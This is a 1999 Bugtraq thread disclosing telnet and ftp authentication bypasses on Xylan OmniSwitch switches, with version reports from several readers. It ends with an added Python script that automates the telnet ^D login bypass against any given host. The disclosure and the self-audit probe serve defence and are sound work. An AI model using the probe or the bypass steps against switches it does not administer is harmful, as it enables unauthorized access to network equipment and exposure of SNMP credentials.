Date: Wed, 31 Mar 1999 19:12:20 +0000
From: pmsac@TOXYN.ORG
To: BUGTRAQ@netspace.org
Subject: Xylan OmniSwitch "features"

Sorry if this is already known.

Stepped into two "features" of Xylan OmniSwitches (also works on Pizza).
These switches are sold OEM to Alcatel (which just bought Xylan) and IBM.

Number one: anyone can telnet to the switch and login, without knowing
either user or password strings. No permission will be given to perform
any command, which is not so bad. This could work as a DoS, because
software versions until 3.1.8 (don't know about later ones) only allow
one interactive session, displaying a message of "System already in use"
in other attempts. However, since you can do this DoS even without
logging in (just sitting at the login prompt) it's not much of a DoS.

Number two: anyone can ftp to the switch, without knowing either user or
password strings. Everyone is allowed to read all files in the flash, and
even upload files (but not remove or overwrite existing ones). Since
reading all files gives access to the SNMP community strings, which are
stored in clear text in one of the files, this could be trouble; and
writing files, well, just use your imagination.

This was tested on software version 3.1.8 (the latest I can access).

Thanks to cock@p.ulh.as, who helped test the vulnerability.

Have a nice day.

Disclaimers:
- This "feature" report was only sent here, personal option; software
  that's worth thousands of dollars should be better beta tested;
- I do know switches aren't generally accessible from the Internet.

-------------------------------------------------------------------------------

Date: Fri, 2 Apr 1999 01:41:40 +0000
From: pmsac@TOXYN.ORG
To: BUGTRAQ@netspace.org
Subject: Re: Xylan OmniSwitch "features"

No, it wasn't an April Fools joke.

To put things really clear, and as I said in the original post:

-quote-
This was tested on software version 3.1.8 (the latest I can access).
-end quote-

Although I said the user could login/ftp without knowing either user or
password strings, I _didn't_ say it would be just a matter of entering
random characters and pressing carriage return (that would be a really
funny one, but hey, it's not much further from the real thing).

To the folks who just wrote me some nice mail saying something as
constructive as

-quote-
We don't think so; or: we don't think, so...
-end quote-

well, think again (I do have some more things to do than posting a
product of my imagination to bugtraq - gee, I must have tested before I
posted, what about that?):

- copy & paste ---------------------------------------------------------
[pmsac@localhost pmsac]$ telnet switch
Trying www.xxx.yyy.zzz...
Connected to www.xxx.yyy.zzz.
Escape character is '^]'.

Welcome to the Xylan OmniSwitch!
Version 3.1.8

login : ajsdkal
password:
**********************************************************************
Xylan OmniSwitch - Copyright (c), 1994-1998 XYLAN Inc.
All rights reserved.
-end copy & paste ------------------------------------------------------

When you get the password prompt, just press ctrl+d (^D); the user string
is arbitrary. You won't get privileges to run any command, not even the
"exit" one; you have to close the connection "manually".

The ftp "feature" is a little different, but, answering to

-quote-
I would very much appreciate an exploit or more detailed explanation of
this vulnerability. We do have Omniswitches 'round these parts. This is
an odd sort of "full-disclosure" posting, BW.
-end quote-

which was a rather polite mail, that's not the question; did I say it
was a full-disclosure post? It would be real fun, had I put it all in
the open, that one of your lusers (or one of mine, for that matter)
worked its way through all the switches... especially since this is not
open source/free software (if it were, I would have contacted the
author(s) first) and I could not publish a patch or a temporary way of
disabling the "features".

And no, we (I) don't need a thread about "full-disclosure and/or getting
in touch with the author(s) first"; read the disclaimers, it's a
personal option.

Sorry for all the ranting, thanks again to cock@p.ulh.as, who helped
test the vulnerability.

Have a nice day.

Disclaimers:
- This "feature" report was only sent here, personal option; software
  that's worth thousands of dollars should be better beta tested;
- I do know switches aren't generally accessible from the Internet.

-------------------------------------------------------------------------------

Date: Thu, 1 Apr 1999 14:31:00 -0500
From: Jeff Murphy
To: BUGTRAQ@netspace.org
Subject: Re: Xylan OmniSwitch "features"

we tried this with Version 3.2.5.17 and we're able to get in.

-- inserted text --

> Number one: anyone can telnet to the switch and login, without knowing
> either user or password strings. No permission will be given to perform

If I understand this, I can hit CR and get in. Just hitting CR keeps
returning the login prompt, using any other character gets me to
password, but CR returns login failure.

> Number two: anyone can ftp to the switch, without knowing either user or
> password strings.

Nope, couldn't get in.

-- end inserted text --

-------------------------------------------------------------------------------

Date: Mon, 5 Apr 1999 13:17:49 -0400
From: Jeff Murphy
To: BUGTRAQ@netspace.org
Subject: Re: Xylan OmniSwitch "features"

Jeff Murphy writes:

> we tried this with Version 3.2.5.17 and we're able to get in.
                                             ^^^^

i meant to type "weren't" but left out a couple of letters. I.e., we
cannot get in using your instructions.

>
> -- inserted text --
>
> > Number one: anyone can telnet to the switch and login, without knowing
> > either user or password strings. No permission will be given to perform
>
> If I understand this, I can hit CR and get in. Just hitting CR keeps
> returning the login prompt, using any other character gets me to
> password, but CR returns login failure.
>
> > Number two: anyone can ftp to the switch, without knowing either user or
> > password strings.
>
> Nope, couldn't get in.
>
> -- end inserted text --

-------------------------------------------------------------------------------

Date: Mon, 5 Apr 1999 13:41:52 -0500
From: Greg Hodges
To: BUGTRAQ@netspace.org
Subject: Re: Xylan OmniSwitch "features"

I am unable to reproduce the telnet "feature" on 3.1.3.3(A), 3.2.5,
3.2.6.4(I), 3.2.7.12(C), and 3.4.2.

Greg Hodges

-------------------------------------------------------------------------------

Date: Mon, 5 Apr 1999 16:30:39 -0400
From: "Wall, Teresa"
To: BUGTRAQ@netspace.org
Subject: Re: Xylan OmniSwitch "features"

unable to get into Xylan OmniSwitch running 3.4.3.28

-------------------------------------------------------------------------------

Date: Tue, 6 Apr 1999 01:20:29 -0400
From: willp2
To: BUGTRAQ@netspace.org
Subject: Re: Xylan OmniSwitch "features"

I tested this on Xylan's 3.2.5 code. I could not reproduce the bug.

-------------------------------------------------------------------------------

Date: Tue, 6 Apr 1999 17:36:23 -0500
From: Chris Sterling
To: BUGTRAQ@netspace.org
Subject: Re: Xylan OmniSwitch "features"

The telnet bug does work on 3.1.9

--------------------------------
Chris Sterling
System Administrator
EazeNet
lemmy@eaze.net
Office: 817-557-3038
Fax: 817-557-3468

-------------------------------------------------------------------------------

Date: Thu, 8 Apr 1999 16:18:33 +0100
From: pmsac
To: BUGTRAQ@netspace.org
Subject: Re: Xylan OmniSwitch "features"

Ok, from all the posts on this thread and from some private mails:

3.2.3 is reported vulnerable to the telnet "feature".
3.2.5 is reported not vulnerable to the same "feature".

Xylan now has the info on the ftp vulnerability. About the telnet
"feature" they said:

-quote-
The "telnet" vulnerability was fixed prior to software release 3.2.6.
-end quote-

--
pmsac@toxyn.org

-------------------------------------------------------------------------------

Date: Fri, 9 Apr 1999 11:28:02 +0100
From: Rui Pedro Bernardino
To: BUGTRAQ@netspace.org
Subject: Re: Xylan OmniSwitch "features"

Please remember this isn't a plain "switch", considering it can run
Checkpoint's fw-1 and WAN interfaces...

--
Rui Pedro Bernardino
Gab. Seguranca Informatica
Av. Miguel Bombarda, No 4, 8o        Tel. +351 1 7922200 ext. 117810
1049-058 Lisboa                      Fax. +351 1 7922497
Portugal                             Mob. +351 931 7489996
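The following is an added example and is not part of the Bugtraq thread nor any Xylan code. It turns the telnet sequence pmsac pasted (arbitrary login name, then ^D at the password prompt) into a probe an administrator can run against their own switch, and classifies the reply: the post-login copyright banner without a password means the bypass is present, a re-prompt or login failure (the reaction Jeff Murphy reports for 3.2.5.17) means it is not. The transport classes, the banner text of the scripted stand-in (reconstructed from the pasted session) and the "login failed" wording used for the fixed behaviour are this example's own constructions and assumptions; nothing is sent to the network unless a host is given on the command line.

```python
"""Added example (not from the thread): probe for the OmniSwitch telnet
login bypass, i.e. any login name followed by ^D (0x04) at the password
prompt. Transport names and scripted replies are constructed here."""
import re
import socket
import sys

IAC = 0xFF
TELNET_OPTION_CMDS = (0xFB, 0xFC, 0xFD, 0xFE)  # WILL, WONT, DO, DONT


def strip_telnet_negotiation(data: bytes) -> bytes:
    """Drop IAC sequences so prompt matching only sees session text.
    IAC+WILL/WONT/DO/DONT carry one option byte; other IAC commands are
    two bytes. (An escaped literal 0xFF, IAC IAC, is not expected here.)"""
    out = bytearray()
    i = 0
    while i < len(data):
        if data[i] == IAC and i + 1 < len(data):
            i += 3 if data[i + 1] in TELNET_OPTION_CMDS else 2
            continue
        out.append(data[i])
        i += 1
    return bytes(out)


def read_until(transport, pattern: bytes, max_reads: int = 50) -> bytes:
    """Accumulate reads until `pattern` matches or the peer goes quiet."""
    buf = b""
    for _ in range(max_reads):
        chunk = transport.read()
        if not chunk:
            break
        buf += strip_telnet_negotiation(chunk)
        if re.search(pattern, buf, re.IGNORECASE):
            break
    return buf


def probe_login_bypass(transport, username: bytes = b"ajsdkal") -> dict:
    """Drive one login attempt and classify the switch's reaction to ^D."""
    banner = read_until(transport, rb"login\s*:")
    if not re.search(rb"login\s*:", banner, re.IGNORECASE):
        return {"status": "no-login-prompt", "version": None}
    m = re.search(rb"Version\s+([0-9][0-9.]*)", banner)
    version = m.group(1).decode() if m else None
    transport.write(username + b"\r\n")      # the user string is arbitrary
    prompt = read_until(transport, rb"password\s*:")
    if not re.search(rb"password\s*:", prompt, re.IGNORECASE):
        return {"status": "no-password-prompt", "version": version}
    transport.write(b"\x04")                  # ^D instead of a password
    reply = read_until(transport, rb"All rights reserved|login\s*:|fail")
    if re.search(rb"All rights reserved", reply):
        status = "bypass"       # post-login banner shown without a password
    elif re.search(rb"login\s*:|fail", reply, re.IGNORECASE):
        status = "rejected"     # re-prompted or told the login failed
    else:
        status = "inconclusive"
    return {"status": status, "version": version}


class SocketTransport:
    """Real telnet connection (port 23) with a read timeout."""
    def __init__(self, host: str, port: int = 23, timeout: float = 3.0):
        self.sock = socket.create_connection((host, port), timeout=timeout)
        self.sock.settimeout(timeout)

    def read(self) -> bytes:
        try:
            return self.sock.recv(4096)
        except socket.timeout:
            return b""

    def write(self, data: bytes) -> None:
        self.sock.sendall(data)

    def close(self) -> None:
        self.sock.close()


class ScriptedTransport:
    """In-memory stand-in replaying the session pasted in the thread.
    vulnerable=False answers with a login failure instead; that reply
    wording is an assumption, not a captured message."""
    PRE_LOGIN = b"\r\nWelcome to the Xylan OmniSwitch!\r\nVersion %s\r\n\r\nlogin : "
    POST_LOGIN = (b"\r\n" + b"*" * 70 + b"\r\nXylan OmniSwitch - Copyright (c), "
                  b"1994-1998 XYLAN Inc.\r\nAll rights reserved.\r\n")
    REJECTED = b"\r\nlogin failed\r\n\r\nlogin : "   # assumed wording

    def __init__(self, version: bytes = b"3.1.8", vulnerable: bool = True):
        self.vulnerable = vulnerable
        # IAC DO ECHO ahead of the banner, as a telnet server would send it
        self.pending = [b"\xff\xfd\x01" + self.PRE_LOGIN % version]
        self.sent_user = False

    def read(self) -> bytes:
        return self.pending.pop(0) if self.pending else b""

    def write(self, data: bytes) -> None:
        if not self.sent_user:
            self.sent_user = True
            self.pending.append(b"password: ")
        elif data == b"\x04" and self.vulnerable:
            self.pending.append(self.POST_LOGIN)
        else:
            self.pending.append(self.REJECTED)

    def close(self) -> None:
        self.pending.clear()


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    t = SocketTransport(target) if target else ScriptedTransport()
    try:
        print(probe_login_bypass(t))
    finally:
        t.close()   # a bypassed session cannot even run "exit"; close it ourselves
```

Run it with a switch address as the only argument to probe a real device; with no argument it replays the scripted 3.1.8 session and reports `bypass`. The check deliberately looks only at what arrives after ^D, so the pre-login "Welcome" banner cannot be mistaken for the post-login copyright text, and a device that simply goes silent is reported as `inconclusive` rather than as fixed.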